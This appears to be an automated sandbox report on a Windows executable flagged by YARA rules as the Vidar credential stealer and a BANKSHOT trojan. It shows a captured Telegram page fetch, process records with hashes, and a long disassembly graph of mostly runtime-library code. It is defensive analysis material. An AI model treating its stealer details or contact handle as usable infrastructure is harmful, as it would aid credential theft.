                                                  2024-07-01 07:12:30 UTC12310INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 67 30 36 37 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 2e
                                                  Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @g067n</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent.


                                                  Statistics

                                                  CPU Usage

                                                  Click to jump to process

                                                  Memory Usage

                                                  Click to jump to process

                                                  High Level Behavior Distribution

                                                  Click to dive into process behavior distribution

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  General

                                                  Target ID:0
                                                  Start time:03:12:17
                                                  Start date:01/07/2024
                                                  Path:C:\Users\user\Desktop\56bDgH9sMQ.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\56bDgH9sMQ.exe"
                                                  Imagebase:0xc60000
                                                  File size:430'592 bytes
                                                  MD5 hash:F88272EA7674D3ACEDD8ADCF7643C598
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:1
                                                  Start time:03:12:17
                                                  Start date:01/07/2024
                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                  Imagebase:0x190000
                                                  File size:65'440 bytes
                                                  MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:2
                                                  Start time:03:12:17
                                                  Start date:01/07/2024
                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                  Imagebase:0x7b0000
                                                  File size:65'440 bytes
                                                  MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: HiddenCobra_BANKSHOT_Gen, Description: Detects Hidden Cobra BANKSHOT trojan, Source: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:high
                                                  Has exited:false

                                                  General

                                                  Target ID:5
                                                  Start time:03:12:17
                                                  Start date:01/07/2024
                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7736 -s 324
                                                  Imagebase:0x5c0000
                                                  File size:483'680 bytes
                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Disassembly

                                                  Reset < >

                                                    Execution Graph

                                                    Execution Coverage:2.3%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:2.1%
                                                    Total number of Nodes:1425
                                                    Total number of Limit Nodes:22
                                                    execution_graph 18533 c690e5 18534 c690f1 ___scrt_is_nonwritable_in_current_image 18533->18534 18559 c6935b 18534->18559 18536 c690f8 18537 c69251 18536->18537 18547 c69122 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallUnexpected 18536->18547 18602 c6993a IsProcessorFeaturePresent 18537->18602 18539 c69258 18606 c74589 18539->18606 18544 c69141 18545 c691c2 18567 c741c7 18545->18567 18547->18544 18547->18545 18584 c74563 18547->18584 18549 c691c8 18571 c87d30 18549->18571 18554 c691ed 18555 c691f6 18554->18555 18593 c7453e 18554->18593 18596 c694cc 18555->18596 18560 c69364 18559->18560 18612 c6962c IsProcessorFeaturePresent 18560->18612 18564 c69375 18565 c69379 18564->18565 18622 c6c3ad 18564->18622 18565->18536 18568 c741d0 18567->18568 18570 c741d5 18567->18570 18682 c73f21 18568->18682 18570->18549 19337 c61430 18571->19337 18576 c87d8e 19382 c65600 18576->19382 18581 c691df 18591 c69a54 GetModuleHandleW 18581->18591 18582 c87dd1 18582->18581 19413 c87590 18582->19413 18585 c701d6 ___scrt_is_nonwritable_in_current_image 18584->18585 18586 c74579 std::_Lockit::_Lockit 18584->18586 18587 c76730 __Getctype 41 API calls 18585->18587 18586->18545 18590 c701e7 18587->18590 18588 c7089f CallUnexpected 41 API calls 18589 c70211 18588->18589 18590->18588 18592 c691e9 18591->18592 18592->18539 18592->18554 19983 c74371 18593->19983 18597 c694d8 18596->18597 18599 c691ff 18597->18599 20058 c7624a 18597->20058 18599->18544 18600 c694e6 18601 c6c3ad ___scrt_uninitialize_crt 7 API calls 18600->18601 18601->18599 18603 c69950 __fread_nolock CallUnexpected 18602->18603 18604 c699fb IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 18603->18604 18605 c69a3f CallUnexpected 18604->18605 18605->18539 18607 c74371 CallUnexpected 23 API calls 18606->18607 18608 c6925e 18607->18608 18609 c7454d 18608->18609 18610 c74371 CallUnexpected 23 API calls 18609->18610 18611 c69266 18610->18611 18613 c69370 18612->18613 18614 c6c38e 18613->18614 18628 c6d467 18614->18628 18617 c6c397 18617->18564 18619 c6c39f 18620 c6c3aa 18619->18620 18642 c6d4a3 18619->18642 18620->18564 18623 c6c3b6 18622->18623 18624 c6c3c0 18622->18624 18625 c6c526 ___vcrt_uninitialize_ptd 6 API calls 18623->18625 18624->18565 18626 c6c3bb 18625->18626 18627 c6d4a3 ___vcrt_uninitialize_locks DeleteCriticalSection 18626->18627 18627->18624 18630 c6d470 18628->18630 18631 c6d499 18630->18631 18632 c6c393 18630->18632 18646 c6d6ac 18630->18646 18633 c6d4a3 ___vcrt_uninitialize_locks DeleteCriticalSection 18631->18633 18632->18617 18634 c6c4f3 18632->18634 18633->18632 18663 c6d5bd 18634->18663 18637 c6c508 18637->18619 18640 c6c523 18640->18619 18643 c6d4ae 18642->18643 18645 c6d4cd 18642->18645 18644 c6d4b8 DeleteCriticalSection 18643->18644 18644->18644 18644->18645 18645->18617 18651 c6d4d2 18646->18651 18649 c6d6e4 InitializeCriticalSectionAndSpinCount 18650 c6d6cf 18649->18650 18650->18630 18652 c6d4ef 18651->18652 18655 c6d4f3 18651->18655 18652->18649 18652->18650 18653 c6d55b GetProcAddress 18653->18652 18655->18652 18655->18653 18656 c6d54c 18655->18656 18658 c6d572 LoadLibraryExW 18655->18658 18656->18653 18657 c6d554 FreeLibrary 18656->18657 18657->18653 18659 c6d5b9 18658->18659 18660 c6d589 GetLastError 18658->18660 18659->18655 18660->18659 18661 c6d594 ___vcrt_FlsFree 18660->18661 18661->18659 18662 c6d5aa LoadLibraryExW 18661->18662 18662->18655 18664 c6d4d2 ___vcrt_FlsFree 5 API calls 18663->18664 18665 c6d5d7 18664->18665 18666 c6d5f0 TlsAlloc 18665->18666 18667 c6c4fd 18665->18667 18667->18637 18668 c6d66e 18667->18668 18669 c6d4d2 ___vcrt_FlsFree 5 API calls 18668->18669 18670 c6d688 18669->18670 18671 c6d6a3 TlsSetValue 18670->18671 18672 c6c516 18670->18672 18671->18672 18672->18640 18673 c6c526 18672->18673 18674 c6c530 18673->18674 18675 c6c536 18673->18675 18677 c6d5f8 18674->18677 18675->18637 18678 c6d4d2 ___vcrt_FlsFree 5 API calls 18677->18678 18679 c6d612 18678->18679 18680 c6d62a TlsFree 18679->18680 18681 c6d61e 18679->18681 18680->18681 18681->18675 18683 c73f2a 18682->18683 18684 c73f40 18682->18684 18683->18684 18688 c73f4d 18683->18688 18684->18570 18686 c73f37 18686->18684 18705 c740b8 18686->18705 18689 c73f56 18688->18689 18690 c73f59 18688->18690 18689->18686 18713 c7ddda 18690->18713 18695 c73f76 18746 c73fa7 18695->18746 18696 c73f6a 18740 c7745c 18696->18740 18701 c7745c ___free_lconv_mon 14 API calls 18702 c73f9a 18701->18702 18703 c7745c ___free_lconv_mon 14 API calls 18702->18703 18704 c73fa0 18703->18704 18704->18686 18706 c74129 18705->18706 18709 c740c7 18705->18709 18706->18684 18707 c7cd2a WideCharToMultiByte _Fputc 18707->18709 18708 c773ff __strnicoll 14 API calls 18708->18709 18709->18706 18709->18707 18709->18708 18711 c7412d 18709->18711 18712 c7745c ___free_lconv_mon 14 API calls 18709->18712 18710 c7745c ___free_lconv_mon 14 API calls 18710->18706 18711->18710 18712->18709 18714 c7dde3 18713->18714 18715 c73f5f 18713->18715 18768 c767eb 18714->18768 18719 c7e0dc GetEnvironmentStringsW 18715->18719 18720 c7e0f4 18719->18720 18721 c73f64 18719->18721 18722 c7cd2a _Fputc WideCharToMultiByte 18720->18722 18721->18695 18721->18696 18723 c7e111 18722->18723 18724 c7e126 18723->18724 18725 c7e11b FreeEnvironmentStringsW 18723->18725 18726 c77686 __fread_nolock 15 API calls 18724->18726 18725->18721 18727 c7e12d 18726->18727 18728 c7e146 18727->18728 18729 c7e135 18727->18729 18731 c7cd2a _Fputc WideCharToMultiByte 18728->18731 18730 c7745c ___free_lconv_mon 14 API calls 18729->18730 18732 c7e13a FreeEnvironmentStringsW 18730->18732 18733 c7e156 18731->18733 18732->18721 18734 c7e165 18733->18734 18735 c7e15d 18733->18735 18737 c7745c ___free_lconv_mon 14 API calls 18734->18737 18736 c7745c ___free_lconv_mon 14 API calls 18735->18736 18738 c7e163 FreeEnvironmentStringsW 18736->18738 18737->18738 18738->18721 18741 c77467 RtlFreeHeap 18740->18741 18742 c73f70 18740->18742 18741->18742 18743 c7747c GetLastError 18741->18743 18742->18686 18744 c77489 __dosmaperr 18743->18744 18745 c7127e __strnicoll 12 API calls 18744->18745 18745->18742 18747 c73fbc 18746->18747 18748 c773ff __strnicoll 14 API calls 18747->18748 18749 c73fe3 18748->18749 18750 c73feb 18749->18750 18759 c73ff5 18749->18759 18751 c7745c ___free_lconv_mon 14 API calls 18750->18751 18767 c73f7d 18751->18767 18752 c74052 18753 c7745c ___free_lconv_mon 14 API calls 18752->18753 18753->18767 18754 c773ff __strnicoll 14 API calls 18754->18759 18755 c74061 19327 c74089 18755->19327 18759->18752 18759->18754 18759->18755 18761 c7407c 18759->18761 18763 c7745c ___free_lconv_mon 14 API calls 18759->18763 19318 c762d9 18759->19318 18760 c7745c ___free_lconv_mon 14 API calls 18762 c7406e 18760->18762 19333 c6daac IsProcessorFeaturePresent 18761->19333 18765 c7745c ___free_lconv_mon 14 API calls 18762->18765 18763->18759 18765->18767 18766 c74088 18767->18701 18769 c767f6 18768->18769 18770 c767fc 18768->18770 18816 c78d71 18769->18816 18774 c76802 18770->18774 18821 c78db0 18770->18821 18792 c76807 18774->18792 18840 c7089f 18774->18840 18779 c76843 18782 c78db0 __strnicoll 6 API calls 18779->18782 18780 c7682e 18781 c78db0 __strnicoll 6 API calls 18780->18781 18783 c7683a 18781->18783 18784 c7684f 18782->18784 18787 c7745c ___free_lconv_mon 14 API calls 18783->18787 18785 c76853 18784->18785 18786 c76862 18784->18786 18788 c78db0 __strnicoll 6 API calls 18785->18788 18835 c7655e 18786->18835 18787->18774 18788->18783 18791 c7745c ___free_lconv_mon 14 API calls 18791->18792 18793 c7dbe5 18792->18793 19123 c7dd3a 18793->19123 18799 c7dc39 18800 c7dc41 18799->18800 18801 c7dc4f 18799->18801 18802 c7745c ___free_lconv_mon 14 API calls 18800->18802 19148 c7de35 18801->19148 18804 c7dc28 18802->18804 18804->18715 18806 c7dc87 18807 c7127e __strnicoll 14 API calls 18806->18807 18809 c7dc8c 18807->18809 18808 c7dcce 18811 c7dd17 18808->18811 19159 c7d857 18808->19159 18812 c7745c ___free_lconv_mon 14 API calls 18809->18812 18810 c7dca2 18810->18808 18813 c7745c ___free_lconv_mon 14 API calls 18810->18813 18815 c7745c ___free_lconv_mon 14 API calls 18811->18815 18812->18804 18813->18808 18815->18804 18851 c78b20 18816->18851 18819 c78da8 TlsGetValue 18820 c78d96 18820->18770 18822 c78b20 std::_Lockit::_Lockit 5 API calls 18821->18822 18823 c78dcc 18822->18823 18824 c76816 18823->18824 18825 c78dea TlsSetValue 18823->18825 18824->18774 18826 c773ff 18824->18826 18827 c7740c 18826->18827 18828 c77437 HeapAlloc 18827->18828 18829 c7744c 18827->18829 18832 c77420 __strnicoll 18827->18832 18830 c7744a 18828->18830 18828->18832 18869 c7127e 18829->18869 18833 c76826 18830->18833 18832->18828 18832->18829 18866 c75d72 18832->18866 18833->18779 18833->18780 18906 c763f2 18835->18906 19008 c79440 18840->19008 18843 c708af 18845 c708b9 IsProcessorFeaturePresent 18843->18845 18850 c708d8 18843->18850 18846 c708c5 18845->18846 19038 c6d883 18846->19038 18847 c7454d CallUnexpected 23 API calls 18849 c708e2 18847->18849 18850->18847 18852 c78b4e 18851->18852 18855 c78b4a 18851->18855 18852->18855 18858 c78a55 18852->18858 18855->18819 18855->18820 18856 c78b68 GetProcAddress 18856->18855 18857 c78b78 std::_Lockit::_Lockit 18856->18857 18857->18855 18864 c78a66 ___vcrt_FlsFree 18858->18864 18859 c78afc 18859->18855 18859->18856 18860 c78a84 LoadLibraryExW 18861 c78b03 18860->18861 18862 c78a9f GetLastError 18860->18862 18861->18859 18863 c78b15 FreeLibrary 18861->18863 18862->18864 18863->18859 18864->18859 18864->18860 18865 c78ad2 LoadLibraryExW 18864->18865 18865->18861 18865->18864 18872 c75d9f 18866->18872 18883 c76881 GetLastError 18869->18883 18871 c71283 18871->18833 18873 c75dab ___scrt_is_nonwritable_in_current_image 18872->18873 18878 c70829 EnterCriticalSection 18873->18878 18875 c75db6 18879 c75df2 18875->18879 18878->18875 18882 c70871 LeaveCriticalSection 18879->18882 18881 c75d7d 18881->18832 18882->18881 18884 c76897 18883->18884 18885 c7689d 18883->18885 18887 c78d71 __strnicoll 6 API calls 18884->18887 18886 c78db0 __strnicoll 6 API calls 18885->18886 18889 c768a1 SetLastError 18885->18889 18888 c768b9 18886->18888 18887->18885 18888->18889 18891 c773ff __strnicoll 12 API calls 18888->18891 18889->18871 18892 c768ce 18891->18892 18893 c768e7 18892->18893 18894 c768d6 18892->18894 18896 c78db0 __strnicoll 6 API calls 18893->18896 18895 c78db0 __strnicoll 6 API calls 18894->18895 18900 c768e4 18895->18900 18897 c768f3 18896->18897 18898 c768f7 18897->18898 18899 c7690e 18897->18899 18901 c78db0 __strnicoll 6 API calls 18898->18901 18903 c7655e __strnicoll 12 API calls 18899->18903 18902 c7745c ___free_lconv_mon 12 API calls 18900->18902 18901->18900 18902->18889 18904 c76919 18903->18904 18905 c7745c ___free_lconv_mon 12 API calls 18904->18905 18905->18889 18907 c763fe ___scrt_is_nonwritable_in_current_image 18906->18907 18920 c70829 EnterCriticalSection 18907->18920 18909 c76408 18921 c76438 18909->18921 18912 c76504 18913 c76510 ___scrt_is_nonwritable_in_current_image 18912->18913 18925 c70829 EnterCriticalSection 18913->18925 18915 c7651a 18926 c766e5 18915->18926 18917 c76532 18930 c76552 18917->18930 18920->18909 18924 c70871 LeaveCriticalSection 18921->18924 18923 c76426 18923->18912 18924->18923 18925->18915 18927 c7671b __Getctype 18926->18927 18928 c766f4 __Getctype 18926->18928 18927->18917 18928->18927 18933 c7f4f3 18928->18933 19007 c70871 LeaveCriticalSection 18930->19007 18932 c76540 18932->18791 18935 c7f573 18933->18935 18936 c7f509 18933->18936 18938 c7745c ___free_lconv_mon 14 API calls 18935->18938 18959 c7f5c1 18935->18959 18936->18935 18942 c7745c ___free_lconv_mon 14 API calls 18936->18942 18943 c7f53c 18936->18943 18937 c7f5cf 18946 c7f62f 18937->18946 18960 c7745c 14 API calls ___free_lconv_mon 18937->18960 18939 c7f595 18938->18939 18940 c7745c ___free_lconv_mon 14 API calls 18939->18940 18944 c7f5a8 18940->18944 18941 c7745c ___free_lconv_mon 14 API calls 18945 c7f568 18941->18945 18947 c7f531 18942->18947 18948 c7745c ___free_lconv_mon 14 API calls 18943->18948 18958 c7f55e 18943->18958 18949 c7745c ___free_lconv_mon 14 API calls 18944->18949 18950 c7745c ___free_lconv_mon 14 API calls 18945->18950 18951 c7745c ___free_lconv_mon 14 API calls 18946->18951 18961 c7e7a9 18947->18961 18953 c7f553 18948->18953 18954 c7f5b6 18949->18954 18950->18935 18955 c7f635 18951->18955 18989 c7ec5d 18953->18989 18957 c7745c ___free_lconv_mon 14 API calls 18954->18957 18955->18927 18957->18959 18958->18941 19001 c7f664 18959->19001 18960->18937 18962 c7e8a3 18961->18962 18963 c7e7ba 18961->18963 18962->18943 18964 c7e7cb 18963->18964 18965 c7745c ___free_lconv_mon 14 API calls 18963->18965 18966 c7e7dd 18964->18966 18967 c7745c ___free_lconv_mon 14 API calls 18964->18967 18965->18964 18968 c7e7ef 18966->18968 18969 c7745c ___free_lconv_mon 14 API calls 18966->18969 18967->18966 18970 c7e801 18968->18970 18972 c7745c ___free_lconv_mon 14 API calls 18968->18972 18969->18968 18971 c7e813 18970->18971 18973 c7745c ___free_lconv_mon 14 API calls 18970->18973 18974 c7e825 18971->18974 18975 c7745c ___free_lconv_mon 14 API calls 18971->18975 18972->18970 18973->18971 18976 c7e837 18974->18976 18977 c7745c ___free_lconv_mon 14 API calls 18974->18977 18975->18974 18978 c7e849 18976->18978 18980 c7745c ___free_lconv_mon 14 API calls 18976->18980 18977->18976 18979 c7e85b 18978->18979 18981 c7745c ___free_lconv_mon 14 API calls 18978->18981 18982 c7e86d 18979->18982 18983 c7745c ___free_lconv_mon 14 API calls 18979->18983 18980->18978 18981->18979 18984 c7e87f 18982->18984 18985 c7745c ___free_lconv_mon 14 API calls 18982->18985 18983->18982 18986 c7e891 18984->18986 18987 c7745c ___free_lconv_mon 14 API calls 18984->18987 18985->18984 18986->18962 18988 c7745c ___free_lconv_mon 14 API calls 18986->18988 18987->18986 18988->18962 18990 c7ec6a 18989->18990 19000 c7ecc2 18989->19000 18991 c7ec7a 18990->18991 18992 c7745c ___free_lconv_mon 14 API calls 18990->18992 18993 c7ec8c 18991->18993 18994 c7745c ___free_lconv_mon 14 API calls 18991->18994 18992->18991 18995 c7ec9e 18993->18995 18996 c7745c ___free_lconv_mon 14 API calls 18993->18996 18994->18993 18997 c7ecb0 18995->18997 18998 c7745c ___free_lconv_mon 14 API calls 18995->18998 18996->18995 18999 c7745c ___free_lconv_mon 14 API calls 18997->18999 18997->19000 18998->18997 18999->19000 19000->18958 19002 c7f690 19001->19002 19003 c7f671 19001->19003 19002->18937 19003->19002 19004 c7f178 __Getctype 14 API calls 19003->19004 19005 c7f68a 19004->19005 19006 c7745c ___free_lconv_mon 14 API calls 19005->19006 19006->19002 19007->18932 19044 c79372 19008->19044 19011 c79485 19012 c79491 ___scrt_is_nonwritable_in_current_image 19011->19012 19013 c76881 __strnicoll 14 API calls 19012->19013 19017 c794be CallUnexpected 19012->19017 19019 c794b8 CallUnexpected 19012->19019 19013->19019 19014 c79505 19016 c7127e __strnicoll 14 API calls 19014->19016 19015 c794ef 19015->18843 19018 c7950a 19016->19018 19021 c79531 19017->19021 19058 c70829 EnterCriticalSection 19017->19058 19055 c6da7f 19018->19055 19019->19014 19019->19015 19019->19017 19024 c79664 19021->19024 19027 c79573 19021->19027 19035 c795a2 19021->19035 19031 c7966f 19024->19031 19090 c70871 LeaveCriticalSection 19024->19090 19025 c7454d CallUnexpected 23 API calls 19029 c79677 19025->19029 19027->19035 19059 c76730 GetLastError 19027->19059 19031->19025 19032 c76730 __Getctype 41 API calls 19036 c795f7 19032->19036 19034 c76730 __Getctype 41 API calls 19034->19035 19086 c79611 19035->19086 19036->19015 19037 c76730 __Getctype 41 API calls 19036->19037 19037->19015 19039 c6d89f __fread_nolock CallUnexpected 19038->19039 19040 c6d8cb IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 19039->19040 19041 c6d99c CallUnexpected 19040->19041 19115 c692b4 19041->19115 19043 c6d9ba 19043->18850 19045 c7937e ___scrt_is_nonwritable_in_current_image 19044->19045 19050 c70829 EnterCriticalSection 19045->19050 19047 c7938c 19051 c793ca 19047->19051 19050->19047 19054 c70871 LeaveCriticalSection 19051->19054 19053 c708a4 19053->18843 19053->19011 19054->19053 19091 c6d9cb 19055->19091 19058->19021 19060 c76746 19059->19060 19061 c7674c 19059->19061 19062 c78d71 __strnicoll 6 API calls 19060->19062 19063 c78db0 __strnicoll 6 API calls 19061->19063 19084 c76750 SetLastError 19061->19084 19062->19061 19064 c76768 19063->19064 19066 c773ff __strnicoll 14 API calls 19064->19066 19064->19084 19067 c7677d 19066->19067 19070 c76796 19067->19070 19071 c76785 19067->19071 19068 c767e5 19072 c7089f CallUnexpected 39 API calls 19068->19072 19069 c767e0 19069->19034 19074 c78db0 __strnicoll 6 API calls 19070->19074 19073 c78db0 __strnicoll 6 API calls 19071->19073 19075 c767ea 19072->19075 19076 c76793 19073->19076 19077 c767a2 19074->19077 19082 c7745c ___free_lconv_mon 14 API calls 19076->19082 19078 c767a6 19077->19078 19079 c767bd 19077->19079 19081 c78db0 __strnicoll 6 API calls 19078->19081 19080 c7655e __strnicoll 14 API calls 19079->19080 19083 c767c8 19080->19083 19081->19076 19082->19084 19085 c7745c ___free_lconv_mon 14 API calls 19083->19085 19084->19068 19084->19069 19085->19084 19087 c79617 19086->19087 19088 c795e8 19086->19088 19114 c70871 LeaveCriticalSection 19087->19114 19088->19015 19088->19032 19088->19036 19090->19031 19092 c6d9dd _Fputc 19091->19092 19097 c6da02 19092->19097 19094 c6d9f5 19108 c6d7bb 19094->19108 19098 c6da12 19097->19098 19099 c6da19 19097->19099 19100 c6d820 _Fputc 16 API calls 19098->19100 19101 c6da27 19099->19101 19102 c6d7f7 _Fputc GetLastError SetLastError 19099->19102 19100->19099 19101->19094 19103 c6da4e 19102->19103 19103->19101 19104 c6daac __Getctype 11 API calls 19103->19104 19105 c6da7e 19104->19105 19106 c6d9cb __strnicoll 41 API calls 19105->19106 19107 c6da8b 19106->19107 19107->19094 19109 c6d7c7 19108->19109 19110 c6d866 _Fputc 41 API calls 19109->19110 19111 c6d7de 19109->19111 19110->19111 19112 c6d866 _Fputc 41 API calls 19111->19112 19113 c6d7f1 19111->19113 19112->19113 19113->19015 19114->19088 19116 c692bc 19115->19116 19117 c692bd IsProcessorFeaturePresent 19115->19117 19116->19043 19119 c69c04 19117->19119 19122 c69bc7 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 19119->19122 19121 c69ce7 19121->19043 19122->19121 19124 c7dd46 ___scrt_is_nonwritable_in_current_image 19123->19124 19125 c7dd60 19124->19125 19167 c70829 EnterCriticalSection 19124->19167 19128 c7dc0f 19125->19128 19130 c7089f CallUnexpected 41 API calls 19125->19130 19127 c7dd9c 19168 c7ddb9 19127->19168 19134 c7d965 19128->19134 19132 c7ddd9 19130->19132 19131 c7dd70 19131->19127 19133 c7745c ___free_lconv_mon 14 API calls 19131->19133 19133->19127 19172 c72fcd 19134->19172 19137 c7d986 GetOEMCP 19139 c7d9af 19137->19139 19138 c7d998 19138->19139 19140 c7d99d GetACP 19138->19140 19139->18804 19141 c77686 19139->19141 19140->19139 19142 c776c4 19141->19142 19146 c77694 __strnicoll 19141->19146 19143 c7127e __strnicoll 14 API calls 19142->19143 19145 c776c2 19143->19145 19144 c776af HeapAlloc 19144->19145 19144->19146 19145->18799 19146->19142 19146->19144 19147 c75d72 codecvt 2 API calls 19146->19147 19147->19146 19149 c7d965 43 API calls 19148->19149 19150 c7de55 19149->19150 19151 c7de92 IsValidCodePage 19150->19151 19156 c7dece __fread_nolock 19150->19156 19154 c7dea4 19151->19154 19151->19156 19152 c692b4 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 19153 c7dc7c 19152->19153 19153->18806 19153->18810 19155 c7ded3 GetCPInfo 19154->19155 19158 c7dead __fread_nolock 19154->19158 19155->19156 19155->19158 19156->19152 19214 c7da39 19158->19214 19160 c7d863 ___scrt_is_nonwritable_in_current_image 19159->19160 19292 c70829 EnterCriticalSection 19160->19292 19162 c7d86d 19293 c7d8a4 19162->19293 19167->19131 19171 c70871 LeaveCriticalSection 19168->19171 19170 c7ddc0 19170->19125 19171->19170 19173 c72fe4 19172->19173 19174 c72feb 19172->19174 19173->19137 19173->19138 19174->19173 19175 c76730 __Getctype 41 API calls 19174->19175 19176 c7300c 19175->19176 19180 c775ca 19176->19180 19181 c73022 19180->19181 19182 c775dd 19180->19182 19184 c77628 19181->19184 19182->19181 19188 c7f73f 19182->19188 19185 c7763b 19184->19185 19187 c77650 19184->19187 19185->19187 19209 c7de22 19185->19209 19187->19173 19189 c7f74b ___scrt_is_nonwritable_in_current_image 19188->19189 19190 c76730 __Getctype 41 API calls 19189->19190 19191 c7f754 19190->19191 19198 c7f79a 19191->19198 19201 c70829 EnterCriticalSection 19191->19201 19193 c7f772 19202 c7f7c0 19193->19202 19198->19181 19199 c7089f CallUnexpected 41 API calls 19200 c7f7bf 19199->19200 19201->19193 19203 c7f783 19202->19203 19204 c7f7ce __Getctype 19202->19204 19206 c7f79f 19203->19206 19204->19203 19205 c7f4f3 __Getctype 14 API calls 19204->19205 19205->19203 19207 c70871 std::_Lockit::~_Lockit LeaveCriticalSection 19206->19207 19208 c7f796 19207->19208 19208->19198 19208->19199 19210 c76730 __Getctype 41 API calls 19209->19210 19211 c7de27 19210->19211 19212 c7dd3a __strnicoll 41 API calls 19211->19212 19213 c7de32 19212->19213 19213->19187 19215 c7da61 GetCPInfo 19214->19215 19224 c7db2a 19214->19224 19220 c7da79 19215->19220 19215->19224 19217 c692b4 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 19219 c7dbe3 19217->19219 19219->19156 19225 c79fba 19220->19225 19223 c7a2b1 45 API calls 19223->19224 19224->19217 19226 c72fcd __strnicoll 41 API calls 19225->19226 19227 c79fda 19226->19227 19245 c7ccae 19227->19245 19229 c7a09e 19232 c692b4 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 19229->19232 19230 c7a096 19248 c68e40 19230->19248 19231 c7a007 19231->19229 19231->19230 19234 c77686 __fread_nolock 15 API calls 19231->19234 19236 c7a02c __fread_nolock __alloca_probe_16 19231->19236 19235 c7a0c1 19232->19235 19234->19236 19240 c7a2b1 19235->19240 19236->19230 19237 c7ccae __fread_nolock MultiByteToWideChar 19236->19237 19238 c7a077 19237->19238 19238->19230 19239 c7a082 GetStringTypeW 19238->19239 19239->19230 19241 c72fcd __strnicoll 41 API calls 19240->19241 19242 c7a2c4 19241->19242 19255 c7a0c3 19242->19255 19246 c7ccbf MultiByteToWideChar 19245->19246 19246->19231 19249 c68e4a 19248->19249 19251 c68e5b 19248->19251 19249->19251 19252 c6dbe5 19249->19252 19251->19229 19253 c7745c ___free_lconv_mon 14 API calls 19252->19253 19254 c6dbfd 19253->19254 19254->19251 19256 c7a0de 19255->19256 19257 c7ccae __fread_nolock MultiByteToWideChar 19256->19257 19261 c7a124 19257->19261 19258 c7a29c 19259 c692b4 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 19258->19259 19260 c7a2af 19259->19260 19260->19223 19261->19258 19262 c77686 __fread_nolock 15 API calls 19261->19262 19264 c7a14a __alloca_probe_16 19261->19264 19272 c7a1d0 19261->19272 19262->19264 19263 c68e40 __freea 14 API calls 19263->19258 19265 c7ccae __fread_nolock MultiByteToWideChar 19264->19265 19264->19272 19266 c7a18f 19265->19266 19266->19272 19283 c78f2f 19266->19283 19269 c7a1c1 19269->19272 19275 c78f2f std::_Locinfo::_Locinfo_ctor 6 API calls 19269->19275 19270 c7a1f9 19271 c7a284 19270->19271 19273 c77686 __fread_nolock 15 API calls 